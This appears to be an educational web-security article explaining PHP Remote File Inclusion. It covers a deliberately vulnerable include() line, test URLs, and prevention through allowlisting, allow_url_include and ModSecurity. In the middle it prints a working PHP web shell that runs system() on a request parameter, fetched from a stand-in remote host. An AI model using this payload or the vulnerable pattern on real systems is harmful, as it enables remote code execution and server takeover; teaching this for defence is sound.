Remote File Inclusion (RFI)

Remote File Inclusion (also known as RFI) is the process of including remote files through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing external URL to be injected.

The consequences of a successful RFI attack include:

  • Sensitive Information Disclosure
  • Cross-site Scripting (XSS)
  • Remote Code Execution
  • Denial of Service (DoS)

How RFI working ?

Since RFI occurs when paths passed to include() statements are not properly sanitized. We should look for scripts which take filenames as parameters. As you can see source code example, this pulls documents stored from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out.

Vulnerability source code example

include($_REQUEST['page'] . '.php');

GET Request parameter

https://malware.expert/index.php?page=home

How to Test ?

In this example the path is extracted from the HTTP request and no input validation is done, so this snippet of code results vulnerable to this type of attack. Consider infact the following URL:

https://malware.expert/index.php?page=http://remote.server/download/execute.code.txt

If its a vulnerable, then any of these things can happen:

  • You might have noticed that the url consisted of “page=home” had no extension. The site may give an error like ‘failure to include execute.code.txt.php‘, this might happen as the site may be automatically adding the .php extension to the pages stored in server.
  • It automatically appends something in the lines of .php then we have to use a null byte ‘%00’ in order to avoid error.
  • successfull execution

What attacker can do ?

The execute.code.txt code allows you to exploit include function and tests if the site if RFI (XSS) vulnerable by running the alert box code. You may send custom commands to the linux server in bash also, but these depend PHP.ini configuration are certain PHP functions disabled. Also phpinfo() function is good, you can get full details of server PHP configuration.

execute.code.txt

<?php
phpinfo();
echo "<script>alert(XSS);</script>";
echo "Run command: ".htmlspecialchars($_GET['command']);
system($_GET['command']);
?>

RFI attack request

https://malware.expert/index.php?command=ls&page=http://remote.server/download/execute.code.txt

We can download (wget/curl), remove (rm), rename almoust do anything users rights in server.

What is the Impact of an Exploited Remote File Inclusion?

Impact may differ depending on the execution permissions of the web server user. Any included source code could be executed by the web server with the privileges of the current the web server user, making it possible to execute arbitrary code. Where the web server user has administrative privileges, full system compromise is also possible.

Preventing Remote File Inclusion (RFI) vulnerabilities

The best way to eliminate Remote File Inclusion (RFI) vulnerabilities is to avoid dynamically including files based on user input. If this is not possible, the application should maintain a check of files that can be included in order to limit the attacker’s control over what gets included.

Additionally, in the case of PHP, most modern PHP configurations are configured with allow_url_include set to off, which would not allow malicious users to include remote files.

Also possible way protect this kind attacks are use ModSecurity with Free rules like (OWASP, Comodo) or even Commercial ModSecurity Rules.